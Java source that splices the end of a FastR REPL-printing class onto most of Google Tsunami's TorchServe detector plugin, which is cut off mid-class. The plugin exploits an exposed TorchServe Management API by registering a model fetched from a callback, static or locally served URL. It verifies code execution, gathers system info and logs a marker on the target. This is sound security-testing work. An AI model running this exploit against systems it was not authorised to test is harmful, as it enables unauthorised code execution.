            result = body.visibleExecute(vf);
            assert checkResult(result);
            if (printResult && result != null) {
                assert topLevel;
                if (visibility.execute(vf)) {
                    printResultImpl(RContext.getInstance(this), result);
                }
            }
            if (topLevel) {
                RErrorHandling.printWarnings(suppressWarnings);
            }
            setVisibility.executeEndOfFunction(vf);
        } catch (RError e) {
            CompilerDirectives.transferToInterpreter();
            throw e;
        } catch (ReturnException ex) {
            CompilerDirectives.transferToInterpreter();
            // condition handling can cause a "return" that needs to skip over this call
            throw ex;
        } catch (BreakException | NextException cfe) {
            if (topLevel) {
                CompilerDirectives.transferToInterpreter();
                // break/next outside any loop is an error only at top level
                throw RError.error(RError.SHOW_CALLER2, RError.Message.NO_LOOP_FOR_BREAK_NEXT);
            } else {
                // there can be an outer loop
                throw cfe;
            }
        } catch (DebugExitException | JumpToTopLevelException | ExitException e) {
            CompilerDirectives.transferToInterpreter();
            throw e;
        } catch (Throwable e) {
            CompilerDirectives.transferToInterpreter();
            // Rethrow JVM-level failures; anything else is unexpected here.
            if (e instanceof Error) {
                throw (Error) e;
            } else if (e instanceof RuntimeException) {
                throw (RuntimeException) e;
            } else {
                assert false : "unexpected exception: " + e;
            }
        }
        return result;
    }

    @Override
    public String getName() {
        return description;
    }

    @Override
    public String toString() {
        return description;
    }

    @Override
    public boolean isCloningAllowed() {
        return false;
    }

    @Override
    public RSyntaxNode getBody() {
        return body.getBody().asRSyntaxNode();
    }
}

/** Thin RootBodyNode wrapper that delegates straight to the wrapped RNode. */
private static final class AnonymousBodyNode extends Node implements RootBodyNode {
    @Child private RNode body;

    AnonymousBodyNode(RNode body) {
        this.body = body;
    }

    @Override
    public Object visibleExecute(VirtualFrame frame) {
        return body.visibleExecute(frame);
    }

    @Override
    public SourceSection getSourceSection() {
        return body.getSourceSection();
    }

    @Override
    public RNode getBody() {
        return body;
    }
}

/** Assertion helper: vectors must pass their internal consistency check. */
@TruffleBoundary
private static boolean checkResult(Object result) {
    if (result instanceof RAbstractVector) {
        return RAbstractVector.verifyVector((RAbstractVector) result);
    }
    return true;
}

@Override
public void printResult(RContext ctx, Object originalResult) {
    printResultImpl(ctx, originalResult);
}

/** Forces promises, normalizes to a vector where possible, and prints in the global env. */
@TruffleBoundary
static void printResultImpl(RContext ctx, Object originalResult) {
    Object result = evaluatePromise(originalResult);
    result = RRuntime.asAbstractVector(result);
    MaterializedFrame callingFrame = REnvironment.globalEnv(ctx).getFrame();
    printValue(ctx, callingFrame, result);
}

/**
 * Prints a value REPL-style: S4 objects via methods::show, other R/Truffle objects via the
 * dispatching print closure, and plain Java values via toString.
 */
private static void printValue(RContext ctx, MaterializedFrame callingFrame, Object result) {
    if (result instanceof RBaseObject || result instanceof TruffleObject) {
        // Protect the value from being modified by the print function.
        Object resultValue = ShareObjectNode.share(evaluatePromise(result));
        if (result instanceof RAttributable && ((RAttributable) result).isS4()) {
            Object printMethod = REnvironment.getRegisteredNamespace(ctx, "methods").get("show");
            RFunction function = (RFunction) evaluatePromise(printMethod);
            CallRFunctionNode.executeSlowpath(function, RCaller.createInvalid(callingFrame), callingFrame,
                            new Object[]{resultValue}, null);
        } else {
            Object printMethod = REnvironment.globalEnv().findFunction("print");
            RFunction function = (RFunction) evaluatePromise(printMethod);
            RSyntaxNode printCall = ((REngine) RContext.getEngine()).replPrintCallNode;
            CallRFunctionNode.executeSlowpath(function, RCaller.create(callingFrame, printCall), callingFrame,
                            new Object[]{resultValue, RArgsValuesAndNames.EMPTY}, null);
        }
        UnShareObjectNode.unshare(resultValue);
    } else {
        // this supports printing of non-R values (via toString for now)
        // NOTE(review): this branch prints via RContext.getInstance() rather than the ctx
        // parameter passed in — presumably equivalent, but verify they cannot differ.
        String str;
        if (result == null) {
            str = "[polyglot value (null)]";
        } else if (result instanceof CharSequence) {
            str = "[1] \"" + result + "\"";
        } else {
            str = String.valueOf(result);
        }
        RContext.getInstance().getConsole().println(str);
    }
}

/** Builds the cached `(function (x, ...) UseMethod("print"))(x)` call used for REPL printing. */
private void initReplPrintSyntaxCallNode() {
    ParsedExpression parsedPrintExpr = parse(Source.newBuilder(RRuntime.R_LANGUAGE_ID,
                    "(function (x, ...) UseMethod(\"print\"))(x)", "<parse>").build(), false);
    RPairList printPL = (RPairList) parsedPrintExpr.getExpression().getDataAt(0);
    replPrintCallNode = RASTUtils.createSyntaxNodeForRValue(printPL);
}

/** Forces {@code value} if it is a promise; otherwise returns it unchanged. */
private static Object evaluatePromise(Object value) {
    return value instanceof RPromise ? PromiseHelperNode.evaluateSlowPath((RPromise) value) : value;
}
}
google/tsunami-security-scanner-plugins
35,727
doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiter.java
/* * Copyright 2023 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.tsunami.plugins.detectors.rce.torchserve; import static com.google.common.base.Preconditions.checkNotNull; import com.google.common.flogger.GoogleLogger; import com.google.errorprone.annotations.CanIgnoreReturnValue; import com.google.gson.Gson; import com.google.gson.GsonBuilder; import com.google.gson.JsonArray; import com.google.gson.JsonElement; import com.google.gson.JsonObject; import com.google.gson.JsonParseException; import com.google.gson.JsonParser; import com.google.tsunami.common.data.NetworkServiceUtils; import com.google.tsunami.common.net.http.HttpClient; import com.google.tsunami.common.net.http.HttpHeaders; import com.google.tsunami.common.net.http.HttpMethod; import com.google.tsunami.common.net.http.HttpRequest; import com.google.tsunami.common.net.http.HttpResponse; import com.google.tsunami.plugin.payload.Payload; import com.google.tsunami.plugin.payload.PayloadGenerator; import com.google.tsunami.proto.AdditionalDetail; import com.google.tsunami.proto.NetworkService; import com.google.tsunami.proto.PayloadGeneratorConfig; import com.google.tsunami.proto.Severity; import com.google.tsunami.proto.TextData; import java.io.IOException; import java.security.MessageDigest; import java.time.Instant; import java.util.ArrayList; import java.util.List; import javax.inject.Inject; import okhttp3.HttpUrl; import org.checkerframework.checker.nullness.qual.Nullable; public 
class TorchServeExploiter {
  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
  private final HttpClient httpClient;
  public final Details details;
  private final PayloadGenerator payloadGenerator;
  private final TorchServeManagementAPIExploiterWebServer webServer;
  // Last payload generated by getTsunamiCallbackUrl(); checked by checkTsunamiCallbackUrl().
  private Payload payload;
  public TorchServeRandomUtils randomUtils;

  /** How aggressively the plugin should exploit a detected Management API. */
  enum ExploitationMode {
    // Just detect the TorchServe Management API, do not attempt to exploit.
    BASIC,
    // Provide Tsunami callback server's URL as a model source, consider any callback as a
    // confirmation.
    SSRF,
    // Provide a static URL as a model source, verify code execution directly.
    STATIC,
    // Serve a model locally, verify code execution directly.
    LOCAL
  }

  /**
   * Effective scan settings plus evidence collected during exploitation.
   *
   * <p>NOTE(review): intentionally a non-static inner class — it reads the enclosing
   * exploiter's {@code payloadGenerator}.
   */
  public class Details {
    // Effective settings (merged from config file and cli args)
    public ExploitationMode exploitationMode;
    public String staticUrl;
    public String localBindHost;
    public int localBindPort;
    public String localAccessibleUrl;
    // Data collected during the exploit
    public List<String> models;
    public boolean hashVerification = false;
    public boolean callbackVerification = false;
    public String systemInfo;
    public boolean cleanupFailed = false;
    public String modelName;
    public String targetUrl;
    public String exploitUrl;
    public String messageLogged;

    // Template for the benign marker written to the target's log; %s is a timestamp.
    static final String LOG_MESSAGE =
        "Tsunami TorchServe Plugin: Detected and executed. Refer to Tsunami Security Scanner repo"
            + " for details. No malicious activity intended. Timestamp: %s";

    /**
     * Constructor for Details class. Initializes the details with configuration and command line
     * arguments.
     *
     * @param config Configuration object.
     * @param args Command line arguments.
     */
    public Details(TorchServeManagementApiConfig config, TorchServeManagementApiArgs args) {
      initializeExploitationMode(args, config);
      initializeUrls(args, config);
      validateParameters();
    }

    // CLI args take precedence over config; "auto" picks SSRF when a callback server exists,
    // otherwise falls back to detection-only BASIC mode.
    private void initializeExploitationMode(
        TorchServeManagementApiArgs args, TorchServeManagementApiConfig config) {
      String mode = args.exploitationMode != null ? args.exploitationMode : config.exploitationMode;
      if (mode.equals("auto")) {
        this.exploitationMode =
            payloadGenerator.isCallbackServerEnabled() ? ExploitationMode.SSRF : ExploitationMode.BASIC;
      } else {
        this.exploitationMode = ExploitationMode.valueOf(mode.toUpperCase());
      }
    }

    // Merge URL/host/port settings, again preferring CLI args over the config file.
    private void initializeUrls(
        TorchServeManagementApiArgs args, TorchServeManagementApiConfig config) {
      this.staticUrl = args.staticUrl != null ? args.staticUrl : config.staticUrl;
      this.localBindHost = args.localBindHost != null ? args.localBindHost : config.localBindHost;
      this.localBindPort = args.localBindPort != 0 ? args.localBindPort : config.localBindPort;
      this.localAccessibleUrl =
          args.localAccessibleUrl != null ? args.localAccessibleUrl : config.localAccessibleUrl;
    }

    // Fail fast if the chosen mode is missing its required parameters.
    private void validateParameters() {
      if (this.exploitationMode == ExploitationMode.STATIC && this.staticUrl == null) {
        throw new IllegalArgumentException(
            "Static mode requires --torchserve-management-api-model-static-url");
      }
      if (this.exploitationMode == ExploitationMode.LOCAL) {
        if (this.localBindHost == null || this.localBindPort == 0 || this.localAccessibleUrl == null) {
          throw new IllegalArgumentException(
              "Local mode requires --torchserve-management-api-local-bind-host,"
                  + " --torchserve-management-api-local-bind-port and"
                  + " --torchserve-management-api-local-accessible-url");
        }
      }
    }

    /** CRITICAL when code execution was verified (hash or callback), LOW otherwise. */
    public Severity getSeverity() {
      return isVerified() ? Severity.CRITICAL : Severity.LOW;
    }

    public boolean isVerified() {
      return this.hashVerification || this.callbackVerification;
    }

    /** Renders a human-readable evidence summary appropriate to the exploitation mode. */
    public AdditionalDetail generateAdditionalDetails() {
      StringBuilder additionalDetails = new StringBuilder();
      switch (this.exploitationMode) {
        case BASIC:
          additionalDetails.append(
              "Callback verification is not enabled in Tsunami configuration, so the exploit"
                  + " could not be confirmed and only the Management API detection is reported."
                  + " It is recommended to enable callback verification for more conclusive"
                  + " vulnerability assessment.");
          if (this.models != null && !this.models.isEmpty()) {
            additionalDetails
                .append("\nModels found on the target:\n - ")
                .append(String.join("\n - ", this.models));
          }
          break;
        case SSRF:
          additionalDetails.append(
              "A callback was received from the target while adding a new model, confirming the"
                  + " exploit. Code execution was not verified directly. For a more direct"
                  + " confirmation of remote code execution, consider using STATIC or LOCAL"
                  + " modes.");
          if (this.models != null && !this.models.isEmpty()) {
            additionalDetails
                .append("\nModels found on the target:\n - ")
                .append(String.join("\n - ", this.models));
          }
          break;
        case STATIC:
        case LOCAL:
          additionalDetails
              .append(
                  "Code execution was verified by adding a new model to the target and performing"
                      + " following actions:\n")
              .append(
                  " - Calculating a hash of a random value and comparing it to the value returned"
                      + " by the target ("
                      + (this.hashVerification ? "Success" : "Failure")
                      + ")\n");
          if (payloadGenerator.isCallbackServerEnabled()) {
            additionalDetails.append(
                " - Sending a callback to the target and confirming that the callback URL was"
                    + " received ("
                    + (this.callbackVerification ? "Success" : "Failure")
                    + ")\n");
          }
          additionalDetails
              .append("System info collected from the target:\n")
              .append(prettyPrintJson(this.systemInfo))
              .append("\n\n")
              .append("The following log entry was generated on the target:\n\n")
              .append(this.messageLogged);
          if (this.models != null && !this.models.isEmpty()) {
            additionalDetails
                .append("\n\nModels found on the target:\n - ")
                .append(String.join("\n - ", this.models));
          }
          break;
      }
      return AdditionalDetail.newBuilder()
          .setDescription("Additional details")
          .setTextData(TextData.newBuilder().setText(additionalDetails.toString()).build())
          .build();
    }
  }

  @Inject
  public TorchServeExploiter(
      TorchServeManagementApiConfig config,
      TorchServeManagementApiArgs args,
      HttpClient httpClient,
      PayloadGenerator payloadGenerator,
      TorchServeManagementAPIExploiterWebServer webServer,
      TorchServeRandomUtils randomUtils) {
    // Redirects are disabled so responses are inspected exactly as the target sends them.
    this.httpClient =
        checkNotNull(httpClient, "httpClient must not be null")
            .modify()
            .setFollowRedirects(false)
            .build();
    // payloadGenerator must be assigned before Details(), which consults it for "auto" mode.
    this.payloadGenerator = checkNotNull(payloadGenerator, "payloadGenerator must not be null");
    this.details =
        new Details(
            checkNotNull(config, "config must not be null"),
            checkNotNull(args, "args must not be null"));
    this.webServer = checkNotNull(webServer, "webServer must not be null");
    this.randomUtils = checkNotNull(randomUtils, "randomUtils must not be null");
  }

  /**
   * Verifies if the target service is vulnerable to TorchServe Management API RCE.
   *
   * @param service The network service to be checked.
   * @return Details of the vulnerability if found, null otherwise.
   */
  public @Nullable Details isServiceVulnerable(NetworkService service) {
    HttpUrl targetUrl = buildTargetUrl(service);
    try {
      return isServiceVulnerable(targetUrl);
    } catch (IOException e) {
      logger.atWarning().withCause(e).log(
          "Failed to check if service is vulnerable due to network error");
    } catch (Exception e) {
      // Boundary catch-all: a detector must never crash the scanner.
      logger.atSevere().withCause(e).log(
          "Unexpected error occurred while checking service vulnerability");
    } finally {
      // Always attempt to remove the planted model, even on failure.
      cleanupExploit();
    }
    return null;
  }

  /**
   * Core detection/exploitation flow: fingerprint the Management API, then act according to
   * the configured {@link ExploitationMode}. Returns the populated details on success, null
   * when the target is not vulnerable (or could not be confirmed).
   */
  private @Nullable Details isServiceVulnerable(HttpUrl targetUrl) throws IOException {
    if (!isTorchServe(targetUrl)) {
      return null;
    }
    logger.atInfo().log("Target matches TorchServe Management API fingerprint");
    // Scrape the list of models from the target
    String modelName = getModelName(targetUrl);
    String url;
    switch (this.details.exploitationMode) {
      case BASIC:
        logger.atFine().log("BASIC MODE");
        // It looks like TorchServe management API, but we can't exploit it as callback
        // functionality has not been enabled
        logger.atInfo().log("Callback verification is not enabled, skipping exploit");
        return this.details;
      case SSRF:
        logger.atFine().log("SSRF MODE");
        // Set the model URL to the Tsunami callback server, consider any callback as a confirmation
        executeExploit(targetUrl, getTsunamiCallbackUrl(), modelName);
        return checkTsunamiCallbackUrl() ? this.details : null;
      case STATIC:
        logger.atFine().log("STATIC MODE");
        // Use the provided URL as a model source, confirm code execution directly
        url = this.details.staticUrl;
        break;
      case LOCAL:
        logger.atFine().log("LOCAL MODE");
        // Serve the model locally, confirm code execution directly
        url = serveExploitFile(modelName);
        break;
      default:
        throw new IllegalArgumentException("Invalid mode: " + this.details.exploitationMode);
    }
    // Common verification for STATIC and LOCAL
    executeExploit(targetUrl, url, modelName);
    // 1. Was the model added to the list of models?
    // if (!getModelNames(targetUrl).contains(modelName)) return null;
    if (!modelExists(targetUrl, modelName)) {
      return null;
    }
    // 2. Can we simulate code execution (hash + callback)?
    if (!verifyExploit(targetUrl, modelName)) {
      return null;
    }
    // Report confirmed vulnerability
    return this.details;
  }

  /** Verifies that the model was added to the list of models on the target. */
  private boolean modelExists(HttpUrl targetUrl, String modelName) throws IOException {
    HttpUrl url = targetUrl.newBuilder().addPathSegment("models").addPathSegment(modelName).build();
    JsonElement response = sendHttpRequestGetJson(HttpMethod.GET, url, null);
    return response != null;
  }

  /**
   * Verifies if the exploit was successful on the target server.
   *
   * <p>This method simulates code execution through hash calculation and, if enabled, through
   * Tsunami's callback server. It also logs and collects system info from the target.
   *
   * @param targetUrl The URL of the target server.
   * @param modelName The name of the model used in the exploit.
   * @return True if the exploit is verified successfully, false otherwise.
   * @throws IOException If an I/O error occurs during the verification process.
   */
  private boolean verifyExploit(HttpUrl targetUrl, String modelName) throws IOException {
    boolean verified = false;
    // Simulate code execution through a hash calculation
    // NOTE(review): interact() may return null; presumably validateHash handles that — verify.
    String randomValue = randomUtils.getRandomValue();
    String hashReceived = interact(targetUrl, modelName, "tsunami-execute", randomValue);
    this.details.hashVerification = randomUtils.validateHash(hashReceived, randomValue);
    verified = this.details.hashVerification;
    // Simulate code execution through Tsunami's callback server
    if (this.payloadGenerator.isCallbackServerEnabled()) {
      String callbackUrl = getTsunamiCallbackUrl();
      interact(targetUrl, modelName, "tsunami-callback", callbackUrl);
      verified |= checkTsunamiCallbackUrl();
    }
    // One of the verification methods must succeed for the exploit to be confirmed
    if (!verified) {
      return false;
    }
    // generate the log file entry on the remote server and collect system info
    // generate the log message by adding a timestamp to the template
    this.details.messageLogged = String.format(Details.LOG_MESSAGE, Instant.now().toString());
    interact(targetUrl, modelName, "tsunami-log", this.details.messageLogged);
    this.details.systemInfo = interact(targetUrl, modelName, "tsunami-info", "True");
    return true;
  }

  // Compares an MD5 of randomValue against the hash reported by the target. MD5 is used only
  // as a verification token here, not for any security property.
  // NOTE(review): this private helper appears unused in the visible code — verifyExploit uses
  // randomUtils.validateHash instead. Confirm whether it can be removed.
  private boolean compareHash(String randomValue, String hash) {
    try {
      MessageDigest md = MessageDigest.getInstance("MD5");
      byte[] digest = md.digest(randomValue.getBytes());
      String expectedHash = String.format("%032x", new java.math.BigInteger(1, digest));
      return expectedHash.equals(hash);
    } catch (java.security.NoSuchAlgorithmException e) {
      return false;
    }
  }

  /**
   * Sends an HTTP request to interact with a specific model on the TorchServe server.
   *
   * <p>This method communicates with the TorchServe model via the Management API, utilizing the
   * 'customized=true' query parameter to bypass the need for locating the Inference API. It sends a
   * request with custom headers and extracts the response from the 'customizedMetadata' field.
   *
   * <p>Note: This approach is used to directly interact with the model through Management API,
   * avoiding issues with locating the Inference API which may be on a different port or not
   * exposed.
   *
   * @param targetUrl The base URL of the TorchServe Management API.
   * @param modelName The name of the model to interact with.
   * @param headerName The name of the header to send in the request.
   * @param headerValue The value of the header to send in the request.
   * @return The response extracted from 'customizedMetadata' field, or null if an error occurs.
   * @throws IOException If an I/O error occurs during the HTTP request.
   */
  private @Nullable @CanIgnoreReturnValue String interact(
      HttpUrl targetUrl, String modelName, String headerName, String headerValue) throws IOException {
    // Generally in order to talk to a model we need to use an Inference API (default port: 8080)
    // which is separate
    // from the Management API (default port: 8081). However, there is a way to hit the model even
    // through Management
    // API by adding the "customized=true" query parameter to the request, as documented here:
    //
    // https://pytorch.org/serve/management_api.html#:~:text=customized=true
    //
    // We're using this trick to send a request to the model in order to avoid the need to locate
    // the Inference API
    // (which might be remapped to an arbitrary port or not exposed at all).
    // With this approach, the actual payload is passed through `tsunami-*` headers and responses
    // are placed to the
    // "customizedMetadata" field of the response.
    //
    // Look at model.py for the supported headers and their meaning.
    //
    // $ curl http://torchserve-081:8081/models/somerandomname?customized=true \
    //     -H 'tsunami-header: <An input value goes here>'
    // [
    //   {
    //     "modelName": "somerandomname",
    //     "modelVersion": "1.0",
    //     "modelUrl": "https://s3.amazonaws.com/model.mar",
    //     "runtime": "python",
    //     "minWorkers": 1,
    //     "maxWorkers": 1,
    //     "batchSize": 1,
    //     "maxBatchDelay": 100,
    //     "loadedAtStartup": false,
    //     "workers": [
    //       {
    //         "id": "9029",
    //         "startTime": "2023-12-18T22:50:13.994Z",
    //         "status": "READY",
    //         "memoryUsage": 227737600,
    //         "pid": 1719,
    //         "gpu": false,
    //         "gpuUsage": "N/A"
    //       }
    //     ],
    //     "customizedMetadata": "<Output value appears here>"
    //   }
    // ]
    HttpHeaders header = HttpHeaders.builder().addHeader(headerName, headerValue).build();
    HttpUrl url =
        targetUrl
            .newBuilder()
            .addPathSegment("models")
            .addPathSegment(modelName)
            .addQueryParameter("customized", "true")
            .build();
    try {
      JsonObject response =
          sendHttpRequestGetJsonArray(HttpMethod.GET, url, header).get(0).getAsJsonObject();
      String result = response.get("customizedMetadata").getAsString();
      return result;
    } catch (NullPointerException | ClassCastException e) {
      // Malformed/unexpected response shape — treat as "no answer" rather than failing the scan.
      return null;
    }
  }

  /**
   * Constructs the target URL for a given network service.
   *
   * <p>This method builds the root URL for a web application based on the provided network service
   * details, typically used as the base URL for further API interactions.
   *
   * @param service The network service for which the URL is being constructed.
   * @return The constructed HttpUrl object for the network service.
   */
  private HttpUrl buildTargetUrl(NetworkService service) {
    return HttpUrl.parse(NetworkServiceUtils.buildWebApplicationRootUrl(service));
  }

  /**
   * Generates a callback URL for Tsunami's payload generator.
   *
   * <p>This method configures and generates a payload for Tsunami's callback server, typically used
   * in SSRF vulnerability testing. The callback URL is used to verify if an external interaction
   * with the Tsunami server occurs, indicating a successful SSRF exploit.
   *
   * @return The generated callback URL for the Tsunami payload.
   */
  private String getTsunamiCallbackUrl() {
    PayloadGeneratorConfig config =
        PayloadGeneratorConfig.newBuilder()
            .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF)
            .setInterpretationEnvironment(
                PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY)
            .setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY)
            .build();
    // Side effect: stores the payload so checkTsunamiCallbackUrl() can verify it later.
    this.payload = this.payloadGenerator.generate(config);
    return this.payload.getPayload();
  }

  /** True if the most recently generated payload was observed executing (callback received). */
  private boolean checkTsunamiCallbackUrl() {
    this.details.callbackVerification = this.payload != null && this.payload.checkIfExecuted();
    return this.details.callbackVerification;
  }

  /**
   * Checks whether the specified target URL corresponds to a TorchServe management API.
   *
   * <p>This method sends a GET request to the target URL to retrieve the API description. It then
   * checks if the response matches the expected signature of a TorchServe management API.
   *
   * @param targetUrl The URL of the target service to be checked.
   * @return True if the target URL is a TorchServe management API, false otherwise.
   * @throws IOException If a network error occurs during the HTTP request.
   */
  private boolean isTorchServe(HttpUrl targetUrl) throws IOException {
    try {
      JsonObject response =
          sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "api-description");
      return response != null && isTorchServeResponse(response);
    } catch (IOException e) {
      logger.atSevere().withCause(e).log("Error checking if target is TorchServe");
      throw e;
    }
  }

  /**
   * Determines if the given response matches the expected signature of a TorchServe API.
   *
   * <p>Analyzes the JSON structure of the response to verify if it contains key elements that match
   * the TorchServe API's characteristics, such as the API title and the presence of specific
   * operation IDs.
   *
   * @param response The JSON object representing the HTTP response to analyze.
* @return True if the response matches the expected TorchServe signature, false otherwise. */ private boolean isTorchServeResponse(JsonObject response) { // Expected JSON structure // { // "openapi": "3.0.1", // "info": { // "title": "TorchServe APIs", // "description": "TorchServe is a flexible and easy to use tool for serving deep learning // models", // "version": "0.8.1" // }, // "paths": { // "/models": { // "post": { // "description": "Register a new model in TorchServe.", // "operationId": "registerModel", String apiTitle = getNestedKey(response, "info", "title"); String registerModel = getNestedKey(response, "paths", "/models", "post", "operationId"); return response.has("openapi") && apiTitle != null && apiTitle.equals("TorchServe APIs") && registerModel != null && registerModel.equals("registerModel"); } /** * Retrieves a nested key value from a JSON object. * * <p>This method navigates through a JSON object using a sequence of keys to retrieve the final * value. It is primarily used for extracting specific data from complex JSON structures. * * @param object The JSON object from which to extract the value. * @param keys A sequence of keys used to navigate to the desired value in the JSON object. * @return The string value of the nested key, or null if the key does not exist or is not a * string. */ private @Nullable String getNestedKey(JsonObject object, String... keys) { try { // Traverse the JSON object until the last key - expect JsonObject at every step for (int i = 0; i < keys.length - 1; i++) { object = object.getAsJsonObject(keys[i]); } // Return the value of the last key - expect it to be a String return object.get(keys[keys.length - 1]).getAsString(); } catch (NullPointerException | ClassCastException e) { return null; } } /** * Generates a unique model name that does not already exist on the target TorchServe server. 
* * <p>This method retrieves a list of existing model names from the target server and generates a * new, random model name that is not in that list. * * @param targetUrl The URL of the TorchServe server to check for existing model names. * @return A unique model name. * @throws IOException If a network error occurs during the HTTP request. */ private String getModelName(HttpUrl targetUrl) throws IOException { // get the list of models from the target List<String> models = getModelNames(targetUrl); this.details.models = models; return generateRandomModelName(models); } /** * Generates a random model name that is not present in the provided list of existing models. * * <p>This method generates a random string and ensures that this string is not already used as a * model name on the target server. * * @param existingModels A list of model names that already exist on the server. * @return A randomly generated, unique model name. */ private String generateRandomModelName(List<String> existingModels) { String modelName; do { modelName = randomUtils.getRandomValue(); } while (existingModels.contains(modelName)); return modelName; } /** * Retrieves a list of model names from the TorchServe server. * * <p>Sends a GET request to the target server's API to fetch the list of currently loaded models. * Note: Handles pagination to retrieve all models if more than the default page limit. * * @param targetUrl The URL of the TorchServe server. * @return A list of model names present on the server. * @throws IOException If a network error occurs during the HTTP request. 
*/ private List<String> getModelNames(HttpUrl targetUrl) throws IOException { // get the list of models from the target List<String> models = new ArrayList<>(); JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "models"); if (response == null) { return models; } // TODO: there's pagination with default limit of 100 models per page // https://github.com/pytorch/serve/blob/master/docs/management_api.md#list-models // // Expected JSON structure: // "models": [ // { // "modelName": "squeezenet1_1", // "modelUrl": "https://torchserve.pytorch.org/mar_files/squeezenet1_1.mar" // }, try { JsonArray modelsArray = response.getAsJsonArray("models"); for (JsonElement model : modelsArray) { models.add(model.getAsJsonObject().get("modelName").getAsString()); } } catch (NullPointerException | ClassCastException e) { // No models found, we'll return an empty list } return models; } /** * Removes a model from the TorchServe server by its name. * * <p>This method sends a DELETE request to the server's API to remove a model specified by its * name. * * @param targetUrl The URL of the TorchServe server. * @param modelName The name of the model to be removed. * @throws IOException If a network error occurs during the HTTP request. */ private void removeModelByName(HttpUrl targetUrl, String modelName) throws IOException { sendHttpRequestGetJsonObject(HttpMethod.DELETE, targetUrl, "models", modelName); } /** * Removes a model from the TorchServe server by its URL. * * <p>Retrieves the list of models from the server and searches for a model with the specified * URL. If found, it uses the model's name to remove it from the server. * * @param targetUrl The URL of the TorchServe server. * @param url The URL of the model to be removed. 
*/ private void removeModelByUrl(HttpUrl targetUrl, String url) { try { // Get the list of models from the target JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "models"); // Look for the model with the specified URL and remove it JsonArray modelsArray = response.getAsJsonArray("models"); for (JsonElement model : modelsArray) { JsonObject modelObject = model.getAsJsonObject(); if (modelObject.get("modelUrl").getAsString().equals(url)) { String modelName = modelObject.get("modelName").getAsString(); removeModelByName(targetUrl, modelName); } } } catch (NullPointerException | ClassCastException | IOException e) { // No models, nothing to remove } } /** * Starts the web server and serves the exploit file. * * <p>This method initiates the web server bound to a specified host and port, and serves an * exploit file located at a given URL. It is used in LOCAL exploitation mode to host the exploit * payload. * * @param modelName The name of the model to be used in the exploit file's name. * @return The URL where the exploit file is served. * @throws IOException If an error occurs while starting the web server. */ private String serveExploitFile(String modelName) throws IOException { this.webServer.start(this.details.localBindHost, this.details.localBindPort); HttpUrl baseUrl = HttpUrl.parse(this.details.localAccessibleUrl) .newBuilder() .addPathSegment(modelName + ".mar") .build(); return baseUrl.toString(); } /** * Executes the exploit against the target TorchServe service. * * <p>Constructs and sends an HTTP POST request to add a new model to the TorchServe service. The * response is analyzed to determine if the model registration was successful, indicating a * potential exploit. * * @param targetUrl The URL of the target TorchServe service. * @param exploitUrl The URL of the exploit payload. * @param modelName The name of the model to register. * @return True if the exploit execution led to successful model registration, false otherwise. 
* @throws IOException If a network error occurs during the HTTP request. */ private @CanIgnoreReturnValue boolean executeExploit( HttpUrl targetUrl, String exploitUrl, String modelName) throws IOException { HttpUrl url = targetUrl .newBuilder() .addPathSegment("models") .addEncodedQueryParameter("url", exploitUrl) .addQueryParameter("batch_size", "1") .addQueryParameter("initial_workers", "1") .addQueryParameter("synchronous", "true") .addQueryParameter("model_name", modelName) .build(); this.details.targetUrl = targetUrl.toString(); this.details.exploitUrl = exploitUrl; // Remove any existing models with the same URL removeModelByUrl(targetUrl, exploitUrl); JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.POST, url); if (response == null) { return false; } // Expected response (200): // // { "status": "Model \"squeezenet1_1\" Version: 1.0 registered with 1 initial workers" } // // Expected response (500): // { // "code": 500, // "type": "InternalServerException", // "message": "Model file already exists squeezenet1_1.mar" // } String message = getNestedKey(response, "status"); if (message == null) { return false; } return message.contains("registered with 1 initial workers"); } /** * Performs cleanup operations after exploit execution. * * <p>This method removes the added model from the TorchServe service and stops the web server. It * is essential for reverting changes made during the exploitation process to maintain a clean * state. */ private void cleanupExploit() { if (this.details.modelName == null || this.details.targetUrl == null) { return; } try { removeModelByName(HttpUrl.parse(this.details.targetUrl), this.details.modelName); } catch (IOException e) { logger.atWarning().withCause(e).log("Failed to cleanup exploit"); this.details.cleanupFailed = true; } this.webServer.stop(); } /** * Sends an HTTP request and returns the response as a JsonObject. * * @param method The HTTP method to use for the request. 
   * @param baseUrl The base URL for the request.
   * @param pathSegments Additional path segments to append to the base URL.
   * @return The response as a JsonObject. NOTE(review): despite the {@code @Nullable} annotation
   *     and the original doc text, this never returns null — {@code sendHttpRequestGetJson} throws
   *     IOException for a non-JSON body, and {@code getAsJsonObject()} throws
   *     IllegalStateException when the JSON is not an object (e.g. an array).
   * @throws IOException If a network error occurs during the HTTP request, or the response body
   *     cannot be parsed as JSON.
   */
  private @CanIgnoreReturnValue @Nullable JsonObject sendHttpRequestGetJsonObject(
      HttpMethod method, HttpUrl baseUrl, String... pathSegments) throws IOException {
    // Headers are omitted (null) for these simple management-API calls.
    return sendHttpRequestGetJson(method, baseUrl, null, pathSegments).getAsJsonObject();
  }

  /**
   * Sends an HTTP request and returns the response as a JsonArray.
   *
   * @param method The HTTP method to use for the request.
   * @param baseUrl The base URL for the request.
   * @param headers The HTTP headers to include in the request.
   * @param pathSegments Additional path segments to append to the base URL.
   * @return The response as a JsonArray. NOTE(review): as with the JsonObject variant, this never
   *     returns null; {@code getAsJsonArray()} throws IllegalStateException when the JSON is not
   *     an array.
   * @throws IOException If a network error occurs during the HTTP request, or the response body
   *     cannot be parsed as JSON.
   */
  private @Nullable JsonArray sendHttpRequestGetJsonArray(
      HttpMethod method, HttpUrl baseUrl, HttpHeaders headers, String... pathSegments)
      throws IOException {
    return sendHttpRequestGetJson(method, baseUrl, headers, pathSegments).getAsJsonArray();
  }

